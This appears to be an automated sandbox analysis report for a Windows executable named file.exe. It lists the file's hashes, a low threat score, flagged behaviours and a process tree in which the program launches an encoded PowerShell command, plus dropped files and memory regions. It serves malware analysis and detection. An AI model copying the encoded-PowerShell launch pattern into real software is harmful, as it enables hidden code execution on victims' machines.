Analysis

  • max time kernel
    119s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240508-en, locale:en-us, os:windows7-x64, system
  • submitted
    18/05/2024, 18:33

General

  • Target

    file.exe

  • Size

    1.0MB

  • MD5

    6e5eee49a751e5c04a74497e21c843b6

  • SHA1

    dc2f6d5353f4f0738a3e3af5f67a82a4035385fd

  • SHA256

    bcfe56501d16cd48586fe4ce169905f5f2fa116e512d4b50c601f3f5ac76ceef

  • SHA512

    7e5aa66c102cf447e6ed8a8ab5419c4ec42432e59af3b0e9211a072bec9b6e3cb18e7227f72f386bc5b72c53f0db96269617e2e309915547056ce14eab368892

  • SSDEEP

    12288:DFbITxwbed/QIA8EmNOwp+y54zcoF7Ca5Jka4zRExDs4CT/PSPdK/4431M73AyJD:5kTFQBeNwQaIEKzTCPdmM73AyXxFLV

Score
3/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1588
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -EncodedCommand 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
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1532

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\file-2969.putik

    Filesize
    33KB

    MD5
    372ad956b41eb69ed573d788d1c3c345

    SHA1
    d938b238dc47899727af8c707866816ffb0b03b7

    SHA256
    830b8c22c6664fa3e113462842678dfdab9a178ecca492467b198e8228202af1

    SHA512
    feb3dc2c6c64ade5a0b80e2a5a6df8c857a6be9feadf2a83f845d6788726849dfb882d1f0dc42344166d2092ec64d25fc8f7899cb69fa14c096ae85cdd13ec33

  • memory/1532-5-0x000007FEF628E000-0x000007FEF628F000-memory.dmp

    Filesize
    4KB

  • memory/1532-6-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

    Filesize
    9.6MB

  • memory/1532-7-0x000000001B560000-0x000000001B842000-memory.dmp

    Filesize
    2.9MB

  • memory/1532-8-0x0000000002910000-0x0000000002918000-memory.dmp

    Filesize
    32KB

  • memory/1532-9-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

    Filesize
    9.6MB

  • memory/1532-10-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

    Filesize
    9.6MB

  • memory/1532-12-0x000000001B450000-0x000000001B45C000-memory.dmp

    Filesize
    48KB

  • memory/1532-13-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

    Filesize
    9.6MB